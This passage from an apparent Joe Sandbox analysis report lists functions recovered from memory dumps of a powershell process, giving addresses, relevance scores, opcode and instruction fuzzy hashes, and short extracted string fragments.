                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5271cf29ab6aad798601a1688140de1f55288070d3656710ad61727c2e4ba6d
                                                                                                        • Instruction ID: 694e320dd8eca9d84cad99fc9108033fdf3cea6cd06b1521672630ed85580506
                                                                                                        • Opcode Fuzzy Hash: d5271cf29ab6aad798601a1688140de1f55288070d3656710ad61727c2e4ba6d
                                                                                                        • Instruction Fuzzy Hash: 9611FE34900209EFDB15CFA8D484E9DBBB2FF48315F288159E405AB365C775A982CF40
                                                                                                        Function 02C8F510 Relevance: .0, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 68dfee0a9eae348b92015d3517695e897ec05a8674bec127906af461d477e623
                                                                                                        • Instruction ID: dc294da27e7cf2df4e998edd687e210732a4f4790ca872b7cf7aa4d1d50c7f52
                                                                                                        • Opcode Fuzzy Hash: 68dfee0a9eae348b92015d3517695e897ec05a8674bec127906af461d477e623
                                                                                                        • Instruction Fuzzy Hash: CB01FF357082008F8B066B3CA8184BD7BE7EFC9622315804EE843C7792CFB88C028F52
                                                                                                        Function 02C8F520 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 626bb13ff32f7954f53aecf64dc22f8b88170efb86c7f40d21efbf9213d0f18f
                                                                                                        • Instruction ID: efaaea7bf04063546ac8ae6a258b372c35f491abd140ef918b766aea8a243c48
                                                                                                        • Opcode Fuzzy Hash: 626bb13ff32f7954f53aecf64dc22f8b88170efb86c7f40d21efbf9213d0f18f
                                                                                                        • Instruction Fuzzy Hash: 87F09A353142108B8609AB2CE81847E77E7EFC9A22311841EF807C3392DFB99C428F92
                                                                                                        Function 08C7042D Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b74ac2c94bd3221dff72be52dfa03a49987af8cd6ab12481f90f1e394f3bddd
                                                                                                        • Instruction ID: 02bf5cb5cdf85067371b48c820cc8fc0b6adc9c749c7cb59699623bbe38a6074
                                                                                                        • Opcode Fuzzy Hash: 3b74ac2c94bd3221dff72be52dfa03a49987af8cd6ab12481f90f1e394f3bddd
                                                                                                        • Instruction Fuzzy Hash: 00F0F630E093859FC71197AAD804AEEBF74AF41220F4580ABD0849B693D7285D0ACBA2
                                                                                                        Function 08C7279A Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1a36e10c160bf32aa986ce4148bf58a43128765677a7602e4e27e975da8d194
                                                                                                        • Instruction ID: 75e82a4b16a4bf1f33fc6961d9bd38b5414bef2aa3694bb71c4390d3999ed683
                                                                                                        • Opcode Fuzzy Hash: e1a36e10c160bf32aa986ce4148bf58a43128765677a7602e4e27e975da8d194
                                                                                                        • Instruction Fuzzy Hash: DCF01D35A00509AFCB15DB88D9409EDF7B6FF88320B248119E915B3660C732AD62DB94
                                                                                                        Function 071A2160 Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa33f296286e761bec1606d981e9a4887534cc1e2f5a1d61f824ef4e2ae03c10
                                                                                                        • Instruction ID: 78c4c79b99d0a496f93116b93216ce58738dfa6698bc972fb1ddf8d0dc9bbfd4
                                                                                                        • Opcode Fuzzy Hash: fa33f296286e761bec1606d981e9a4887534cc1e2f5a1d61f824ef4e2ae03c10
                                                                                                        • Instruction Fuzzy Hash: 7ED02EBBF1012097822A2068BC100EAB386A7E92B070100B3C902C7340EB328C2683A0
                                                                                                        Function 02C8FDCC Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de05a80fc61d9dc9698e4a036c5a4c7c80ae49013ae6a9a1b79cb6cf1ab0000b
                                                                                                        • Instruction ID: c893072c138772bc1fccca41011379e9648a23a8c61e9ab1437d7e3872d538a5
                                                                                                        • Opcode Fuzzy Hash: de05a80fc61d9dc9698e4a036c5a4c7c80ae49013ae6a9a1b79cb6cf1ab0000b
                                                                                                        • Instruction Fuzzy Hash: 41E01A71C00244DFC750DFB8C94115EBFF0AB1A210B2484EEC448D7221E2328652CB81
                                                                                                        Function 02C8FDD8 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                        • Instruction ID: 63c4a3ef3279289effebbb0e3d78bad1032efb7849da4a2b4ba4430e45c69dab
                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                        • Instruction Fuzzy Hash: 9BD042B1D042099F8780EFA9894156EFBF4AB59204B6085AE8959E7201E6329A128BD1

                                                                                                        Non-executed Functions

                                                                                                        Function 071AD8DD Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
                                                                                                        • API String ID: 0-328666906
                                                                                                        • Opcode ID: e9ec92dec0bdb8c4b2d9a4fa8b1b962b78408591e938a7dfa8bc007b1d05686d
                                                                                                        • Instruction ID: 134d27ac5d38cf071b3020d6ba13c5c86d5bf471f3f998e307540d61f0ebc375
                                                                                                        • Opcode Fuzzy Hash: e9ec92dec0bdb8c4b2d9a4fa8b1b962b78408591e938a7dfa8bc007b1d05686d
                                                                                                        • Instruction Fuzzy Hash: 80715DB9B00706BFDB258F24E811B7ABBA2BF89210F148455D8859B7C8DB31DD41C7A1
                                                                                                        Function 071A0918 Relevance: 10.3, Strings: 8, Instructions: 316COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q
                                                                                                        • API String ID: 0-492062855
                                                                                                        • Opcode ID: 6827b946e7599a318f8c999f34ad326b5c8b027340142eb9fa56e9203e2d0d38
                                                                                                        • Instruction ID: 39ef4a207de322d503cee0ef1e96b2f7db066aeca2747e0624e06c0124487d38
                                                                                                        • Opcode Fuzzy Hash: 6827b946e7599a318f8c999f34ad326b5c8b027340142eb9fa56e9203e2d0d38
                                                                                                        • Instruction Fuzzy Hash: D0A18DBA7043169FD7268A799811776BFE1AFCA210F1980BBD845CB2D1EB31CD41C7A1
                                                                                                        Function 071AAE66 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3499190445
                                                                                                        • Opcode ID: ed61cf40d264e9c30a99311cb2617df6ca77ff569f00075554e192ce754c6e79
                                                                                                        • Instruction ID: 8e9519bdf12e2c12a1b494593adc570927511be2fb652eed106038a9af1c29d6
                                                                                                        • Opcode Fuzzy Hash: ed61cf40d264e9c30a99311cb2617df6ca77ff569f00075554e192ce754c6e79
                                                                                                        • Instruction Fuzzy Hash: C8126DB4A003199FDB25DB54C955BDABBB2BF89300F1081E9D9096F781CB72AD81CF91
                                                                                                        Function 071AEBD5 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XRq$XRq$XRq$tPq$tPq$$q
                                                                                                        • API String ID: 0-422185277
                                                                                                        • Opcode ID: ee5168dd0c83e324323950f6993b7613b7bc3f9f9c39f7e2eb862cc5348855d9
                                                                                                        • Instruction ID: 2d190c1ec762f7bb8fd78fba4abfa62e26c75b67de2211ca8b1ee825abcaa3f4
                                                                                                        • Opcode Fuzzy Hash: ee5168dd0c83e324323950f6993b7613b7bc3f9f9c39f7e2eb862cc5348855d9
                                                                                                        • Instruction Fuzzy Hash: 8B613D75B10206AFDB259B68C45276ABBB2FF89310F28C569E8059F3C1CB31DD49C7A1
                                                                                                        Function 071A1440 Relevance: 7.7, Strings: 6, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPq$tPq$$q$$q$$q$$q
                                                                                                        • API String ID: 0-3638282964
                                                                                                        • Opcode ID: 98669ea36ccfe742e66053df9de444a1f018f5ab99b2703ef811fcf799fb7a93
                                                                                                        • Instruction ID: 0121548c247bdda88b93ab9c75b0362d9a58bbffbf5c2324c2217931f0e76d72
                                                                                                        • Opcode Fuzzy Hash: 98669ea36ccfe742e66053df9de444a1f018f5ab99b2703ef811fcf799fb7a93
                                                                                                        • Instruction Fuzzy Hash: 59518EB9B0434ABFDB264A6D9810766BBB2AFC6311F1C806BE546CB2C1DB71C841C391
                                                                                                        Function 071AF780 Relevance: 6.4, Strings: 5, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 79f3724aee16b691ea9205047a0f6f80691d1fec3f2e6cb14cb8ec0c568daefe
                                                                                                        • Instruction ID: 0b40c416ab14a72ef1e5de9aeaabfb3f92315a3ac8be682e01f972fc59e21571
                                                                                                        • Opcode Fuzzy Hash: 79f3724aee16b691ea9205047a0f6f80691d1fec3f2e6cb14cb8ec0c568daefe
                                                                                                        • Instruction Fuzzy Hash: AE5125B9B0020AEFDB2A8E65D4057AA7BA5EF85311F15C06AE8059F2D1C730DD43CB91
                                                                                                        Function 071A0538 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 4837f4cd94a6481fc355746183b85f01787b6a471467f4a5ad7e879ce68883d3
                                                                                                        • Instruction ID: 52ecacc7ddbf3ac83b6409c03a95b2ea04a04faa02fe500b45631a57232af8c5
                                                                                                        • Opcode Fuzzy Hash: 4837f4cd94a6481fc355746183b85f01787b6a471467f4a5ad7e879ce68883d3
                                                                                                        • Instruction Fuzzy Hash: DF4128B4B04306EFDB2A4A3598207BA7FB5AFC9214F15846AD906CB2C1EB31CD41C7A1
                                                                                                        Function 071A54C8 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 877cd72cead4d5a967337b160435cfe1435f6aec40a5bc5c9aac8bbc6eb587ce
                                                                                                        • Instruction ID: bc5c51f300f7e41163e9203eaa175579da8abb7fb24922d108f1d229a4229ad3
                                                                                                        • Opcode Fuzzy Hash: 877cd72cead4d5a967337b160435cfe1435f6aec40a5bc5c9aac8bbc6eb587ce
                                                                                                        • Instruction Fuzzy Hash: 09411ABDB08207FFDF2A4A65A40017AB7F3AF81221F29856AFC158B1D1DB31C961C751
                                                                                                        Function 071ADC35 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 8890adfcb76d353342c10f9614498d32db552d3c91838593e28b013805ff2c04
                                                                                                        • Instruction ID: 6d8f8dffda24e33141beb81fe09bdddec5da1f96a70c24cf989c9975fe4e00f1
                                                                                                        • Opcode Fuzzy Hash: 8890adfcb76d353342c10f9614498d32db552d3c91838593e28b013805ff2c04
                                                                                                        • Instruction Fuzzy Hash: 25315DBA714707EBDB3A06657440376B7A1ABC5111B64807ED8C2C7ACDDB75C401C391
                                                                                                        Function 071AD9DE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                                                        • API String ID: 0-706544200
                                                                                                        • Opcode ID: 8eb80153c6792a246f9d8d7c001753bb46f63a52ee489dd64996c62eae12f6e8
                                                                                                        • Instruction ID: 1745bc99f3eae4600ee3c734ffd4ea515b3b4c39423275a867ea772216320f68
                                                                                                        • Opcode Fuzzy Hash: 8eb80153c6792a246f9d8d7c001753bb46f63a52ee489dd64996c62eae12f6e8
                                                                                                        • Instruction Fuzzy Hash: 5031B3B8B00605AFDB24DF54E450B6AB7B2FF89610F29C195E845AB784C731DD41CB91
                                                                                                        Function 071AD1A8 Relevance: 5.4, Strings: 4, Instructions: 409COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$(oq$(oq$(oq
                                                                                                        • API String ID: 0-3853041632
                                                                                                        • Opcode ID: d659146f659115230451c7d80aa998803614b8a147a11f9bab6a6d70f44de3fd
                                                                                                        • Instruction ID: fe61a1ed083c6f64a8f742b4ce93dc97691637433c52c62e854d5350a2ea2de5
                                                                                                        • Opcode Fuzzy Hash: d659146f659115230451c7d80aa998803614b8a147a11f9bab6a6d70f44de3fd
                                                                                                        • Instruction Fuzzy Hash: 9AE15AB9B04706EFDB168F34E8047AA7BB1FF85211F1484AAE495CBAD5CB31D841CB61
                                                                                                        Function 071A36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q$$q$$q
                                                                                                        • API String ID: 0-4102054182
                                                                                                        • Opcode ID: 9e2a63068a62d954a66fb8136ba2ed571e6d7fc31e25ac5b9c0e31cec9f2cbda
                                                                                                        • Instruction ID: c346811dc2bf57ea4fec50fe3432fc667e1dfd6d166c0f6a7c40dcc783887387
                                                                                                        • Opcode Fuzzy Hash: 9e2a63068a62d954a66fb8136ba2ed571e6d7fc31e25ac5b9c0e31cec9f2cbda
                                                                                                        • Instruction Fuzzy Hash: BD216BF97103067BE7395AAA9C11B27B6DA9BC2711F24803AA915CB3C1DF31C8418370
                                                                                                        Function 071A9370 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0#At$4'q$4'q$X#j
                                                                                                        • API String ID: 0-1147965119
                                                                                                        • Opcode ID: 282667369331bc609eb4beecca787f2a65e69fae7b45e47540ef53961da82ce9
                                                                                                        • Instruction ID: a0ee94e6415cbb298399ef5d1551ae00ff57dea50ea950122fb47745f00167be
                                                                                                        • Opcode Fuzzy Hash: 282667369331bc609eb4beecca787f2a65e69fae7b45e47540ef53961da82ce9
                                                                                                        • Instruction Fuzzy Hash: 111108F9E0A382EFC727063965102A67F715F87611B1A4197C8859F1D6CB35ACC6C363
                                                                                                        Function 071A9270 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$h#j$$q
                                                                                                        • API String ID: 0-1248868988
                                                                                                        • Opcode ID: 595504b491cbc2da4f86234f4ee516696ad11c5e9f0c36065f3190ec3b445b5b
                                                                                                        • Instruction ID: b9af942404fed4d862d005c5d638be58d908d4c81a0e70e15d2950d61b3274d0
                                                                                                        • Opcode Fuzzy Hash: 595504b491cbc2da4f86234f4ee516696ad11c5e9f0c36065f3190ec3b445b5b
                                                                                                        • Instruction Fuzzy Hash: 171104FA609381AFDB27066D24142A23F725FC3601B1B45D7C9828F5D6CB25ACC5C362
                                                                                                        Function 071A0308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q
                                                                                                        • API String ID: 0-3199993180
                                                                                                        • Opcode ID: ac466ecb69be36bb8438e590a656d85f38c1d44560d5c31355bc536a23f5afaf
                                                                                                        • Instruction ID: 2704ed9626b84967e09722fc8b66ebd686aaa53df8c7f3d15496a14c097c968d
                                                                                                        • Opcode Fuzzy Hash: ac466ecb69be36bb8438e590a656d85f38c1d44560d5c31355bc536a23f5afaf
                                                                                                        • Instruction Fuzzy Hash: 1401DB62B0D3C24FC32B026928212AA6FB25F87590B2E40D7C485EF6D3DA144C0A83A7